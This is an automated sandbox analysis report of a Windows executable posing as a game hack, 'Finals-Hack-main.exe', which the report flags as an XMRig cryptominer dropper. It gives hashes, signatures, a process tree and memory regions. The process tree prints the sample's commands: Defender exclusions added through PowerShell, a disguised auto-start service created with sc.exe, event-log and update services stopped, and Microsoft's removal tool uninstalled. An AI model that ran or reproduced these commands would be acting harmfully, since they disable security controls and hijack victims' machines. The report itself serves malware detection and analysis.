Analysis

  • max time kernel
    1s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10/01/2024, 12:29

General

  • Target

    Finals-Hack-main.exe

  • Size

    58.2MB

  • MD5

    00d14fa33fb1c9edd51ac7c47d2510f5

  • SHA1

    5adf21e21622a439e211749823b54c01d8358e49

  • SHA256

    b4b357887dfb39ceb3f3bf4c2c6e54839680a51befa3ef4e6b5ac5692b4d0df0

  • SHA512

    b03726dd3b52541e203448e858a12765df2dc1a57086e945c0bbb15ba73fd9e6cde9ad41e69442856617cc8890c0ae1955b7b71d8c5f7fc562426fe05ba9cf46

  • SSDEEP

    393216:u7SMdOjyyS2g0fxhOqy9goMLsADn0xIdunHm+:uFb2glA7L52nG+

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 3 IoCs
  • Creates new service(s) 1 TTPs
  • Stops running service(s) 3 TTPs
  • UPX packed file 12 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file 6 IoCs

    Detects executables packed with VMProtect commercial packer.

  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Program crash 2 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Finals-Hack-main.exe
    "C:\Users\Admin\AppData\Local\Temp\Finals-Hack-main.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\""
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
    • C:\Windows\System32\Wbem\wmic.exe
      wmic csproduct get uuid
      2⤵
        PID:896
      • C:\Users\Admin\AppData\Roaming\driver3.exe
        C:\Users\Admin\AppData\Roaming\driver3.exe
        2⤵
          PID:356
        • C:\Users\Admin\AppData\Roaming\driver1.exe
          C:\Users\Admin\AppData\Roaming\driver1.exe
          2⤵
            PID:4028
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
              3⤵
                PID:3508
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 444
                  4⤵
                  • Program crash
                  PID:1624
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 3508 -s 448
                  4⤵
                  • Program crash
                  PID:2400
            • C:\Users\Admin\AppData\Roaming\driver2.exe
              C:\Users\Admin\AppData\Roaming\driver2.exe
              2⤵
                PID:2984
                • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                  3⤵
                    PID:1432
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe start "XSVRRPDE"
                    3⤵
                    • Launches sc.exe
                    PID:1596
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe stop eventlog
                    3⤵
                    • Launches sc.exe
                    PID:3184
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe create "XSVRRPDE" binpath= "C:\ProgramData\urumgbrirqvd\nujvppwoatti.exe" start= "auto"
                    3⤵
                    • Launches sc.exe
                    PID:4596
                  • C:\Windows\system32\sc.exe
                    C:\Windows\system32\sc.exe delete "XSVRRPDE"
                    3⤵
                    • Launches sc.exe
                    PID:424
                  • C:\Windows\system32\powercfg.exe
                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                    3⤵
                      PID:4064
                    • C:\Windows\system32\powercfg.exe
                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                      3⤵
                        PID:4728
                      • C:\Windows\system32\powercfg.exe
                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                        3⤵
                          PID:1348
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                          3⤵
                            PID:2260
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop dosvc
                            3⤵
                            • Launches sc.exe
                            PID:2944
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop bits
                            3⤵
                            • Launches sc.exe
                            PID:2740
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop wuauserv
                            3⤵
                            • Launches sc.exe
                            PID:2808
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                            3⤵
                            • Launches sc.exe
                            PID:4612
                          • C:\Windows\system32\sc.exe
                            C:\Windows\system32\sc.exe stop UsoSvc
                            3⤵
                            • Launches sc.exe
                            PID:1872
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                            3⤵
                              PID:4616
                        • C:\ProgramData\urumgbrirqvd\nujvppwoatti.exe
                          C:\ProgramData\urumgbrirqvd\nujvppwoatti.exe
                          1⤵
                            PID:3676
                            • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                              C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                              2⤵
                                PID:376
                              • C:\Windows\system32\sc.exe
                                C:\Windows\system32\sc.exe stop wuauserv
                                2⤵
                                • Launches sc.exe
                                PID:1652
                              • C:\Windows\system32\svchost.exe
                                svchost.exe
                                2⤵
                                  PID:1512
                                • C:\Windows\system32\conhost.exe
                                  C:\Windows\system32\conhost.exe
                                  2⤵
                                    PID:3296
                                  • C:\Windows\system32\powercfg.exe
                                    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                    2⤵
                                      PID:4524
                                    • C:\Windows\system32\powercfg.exe
                                      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                      2⤵
                                        PID:5064
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        2⤵
                                          PID:2320
                                        • C:\Windows\system32\powercfg.exe
                                          C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                          2⤵
                                            PID:424
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop dosvc
                                            2⤵
                                            • Launches sc.exe
                                            PID:1088
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop bits
                                            2⤵
                                            • Launches sc.exe
                                            PID:2096
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                            2⤵
                                            • Launches sc.exe
                                            PID:2192
                                          • C:\Windows\system32\sc.exe
                                            C:\Windows\system32\sc.exe stop UsoSvc
                                            2⤵
                                            • Launches sc.exe
                                            PID:3580
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                            2⤵
                                              PID:2400
                                          • C:\Windows\system32\wusa.exe
                                            wusa /uninstall /kb:890830 /quiet /norestart
                                            1⤵
                                              PID:1720
                                            • C:\Windows\system32\wusa.exe
                                              wusa /uninstall /kb:890830 /quiet /norestart
                                              1⤵
                                                PID:4340
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 3508 -ip 3508
                                                1⤵
                                                  PID:3020
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 3508 -ip 3508
                                                  1⤵
                                                    PID:3476
                                                  • C:\Windows\SysWOW64\dialer.exe
                                                    "C:\Windows\system32\dialer.exe"
                                                    1⤵
                                                      PID:2404

                                                    Network

                                                          MITRE ATT&CK Enterprise v15

                                                          Replay Monitor

                                                          Loading Replay Monitor...

                                                          Downloads

                                                          • memory/376-76-0x000001A308480000-0x000001A308490000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/376-94-0x000001A321120000-0x000001A32113A000-memory.dmp

                                                            Filesize

                                                            104KB

                                                          • memory/376-95-0x000001A3210D0000-0x000001A3210D8000-memory.dmp

                                                            Filesize

                                                            32KB

                                                          • memory/376-98-0x000001A308480000-0x000001A308490000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/376-101-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/376-97-0x000001A321110000-0x000001A32111A000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/376-96-0x000001A321100000-0x000001A321106000-memory.dmp

                                                            Filesize

                                                            24KB

                                                          • memory/376-93-0x000001A3210C0000-0x000001A3210CA000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/376-87-0x000001A320E90000-0x000001A320EAC000-memory.dmp

                                                            Filesize

                                                            112KB

                                                          • memory/376-92-0x000001A3210E0000-0x000001A3210FC000-memory.dmp

                                                            Filesize

                                                            112KB

                                                          • memory/376-89-0x000001A308480000-0x000001A308490000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/376-91-0x000001A320F70000-0x000001A320F7A000-memory.dmp

                                                            Filesize

                                                            40KB

                                                          • memory/376-90-0x000001A320EB0000-0x000001A320F65000-memory.dmp

                                                            Filesize

                                                            724KB

                                                          • memory/376-88-0x00007FF456B80000-0x00007FF456B90000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/376-75-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/376-77-0x000001A308480000-0x000001A308490000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1432-55-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/1432-52-0x0000025F19B10000-0x0000025F19B20000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1432-51-0x00007FFFE7EC0000-0x00007FFFE8981000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/1432-53-0x0000025F19B10000-0x0000025F19B20000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/1512-113-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-112-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-110-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-150-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-111-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-114-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-117-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-118-0x000001F2173B0000-0x000001F2173D0000-memory.dmp

                                                            Filesize

                                                            128KB

                                                          • memory/1512-120-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-116-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-119-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-121-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-123-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/1512-122-0x0000000140000000-0x0000000140848000-memory.dmp

                                                            Filesize

                                                            8.3MB

                                                          • memory/2404-142-0x00000000020B0000-0x00000000024B0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/2404-138-0x00000000020B0000-0x00000000024B0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/2404-139-0x00000000020B0000-0x00000000024B0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/2404-136-0x00000000004B0000-0x00000000004B9000-memory.dmp

                                                            Filesize

                                                            36KB

                                                          • memory/2404-143-0x0000000075AD0000-0x0000000075CE5000-memory.dmp

                                                            Filesize

                                                            2.1MB

                                                          • memory/2404-145-0x00000000020B0000-0x00000000024B0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/2404-140-0x00007FF8074D0000-0x00007FF8076C5000-memory.dmp

                                                            Filesize

                                                            2.0MB

                                                          • memory/2984-38-0x00007FF75D7A0000-0x00007FF75E4C1000-memory.dmp

                                                            Filesize

                                                            13.1MB

                                                          • memory/2984-37-0x00007FF75D7A0000-0x00007FF75E4C1000-memory.dmp

                                                            Filesize

                                                            13.1MB

                                                          • memory/2984-57-0x00007FF75D7A0000-0x00007FF75E4C1000-memory.dmp

                                                            Filesize

                                                            13.1MB

                                                          • memory/2984-36-0x00007FF8076D0000-0x00007FF8076D2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3296-105-0x0000000140000000-0x000000014000E000-memory.dmp

                                                            Filesize

                                                            56KB

                                                          • memory/3296-102-0x0000000140000000-0x000000014000E000-memory.dmp

                                                            Filesize

                                                            56KB

                                                          • memory/3296-106-0x0000000140000000-0x000000014000E000-memory.dmp

                                                            Filesize

                                                            56KB

                                                          • memory/3296-103-0x0000000140000000-0x000000014000E000-memory.dmp

                                                            Filesize

                                                            56KB

                                                          • memory/3296-109-0x0000000140000000-0x000000014000E000-memory.dmp

                                                            Filesize

                                                            56KB

                                                          • memory/3296-104-0x0000000140000000-0x000000014000E000-memory.dmp

                                                            Filesize

                                                            56KB

                                                          • memory/3508-135-0x0000000075AD0000-0x0000000075CE5000-memory.dmp

                                                            Filesize

                                                            2.1MB

                                                          • memory/3508-144-0x0000000003BF0000-0x0000000003FF0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/3508-128-0x0000000000C20000-0x0000000000CA8000-memory.dmp

                                                            Filesize

                                                            544KB

                                                          • memory/3508-127-0x0000000000C20000-0x0000000000CA8000-memory.dmp

                                                            Filesize

                                                            544KB

                                                          • memory/3508-124-0x0000000000C20000-0x0000000000CA8000-memory.dmp

                                                            Filesize

                                                            544KB

                                                          • memory/3508-129-0x0000000003BF0000-0x0000000003FF0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/3508-131-0x0000000003BF0000-0x0000000003FF0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/3508-132-0x00007FF8074D0000-0x00007FF8076C5000-memory.dmp

                                                            Filesize

                                                            2.0MB

                                                          • memory/3508-134-0x0000000003BF0000-0x0000000003FF0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/3508-130-0x0000000003BF0000-0x0000000003FF0000-memory.dmp

                                                            Filesize

                                                            4.0MB

                                                          • memory/3676-115-0x00007FF770A00000-0x00007FF771721000-memory.dmp

                                                            Filesize

                                                            13.1MB

                                                          • memory/3676-61-0x00007FF770A00000-0x00007FF771721000-memory.dmp

                                                            Filesize

                                                            13.1MB

                                                          • memory/3676-60-0x00007FF8076D0000-0x00007FF8076D2000-memory.dmp

                                                            Filesize

                                                            8KB

                                                          • memory/3676-62-0x00007FF770A00000-0x00007FF771721000-memory.dmp

                                                            Filesize

                                                            13.1MB

                                                          • memory/4028-125-0x00007FF782920000-0x00007FF782BDA000-memory.dmp

                                                            Filesize

                                                            2.7MB

                                                          • memory/4388-9-0x0000023C0FD60000-0x0000023C0FD82000-memory.dmp

                                                            Filesize

                                                            136KB

                                                          • memory/4388-10-0x00007FFFE89F0000-0x00007FFFE94B1000-memory.dmp

                                                            Filesize

                                                            10.8MB

                                                          • memory/4388-12-0x0000023C0DF80000-0x0000023C0DF90000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/4388-11-0x0000023C0DF80000-0x0000023C0DF90000-memory.dmp

                                                            Filesize

                                                            64KB

                                                          • memory/4388-15-0x00007FFFE89F0000-0x00007FFFE94B1000-memory.dmp

                                                            Filesize

                                                            10.8MB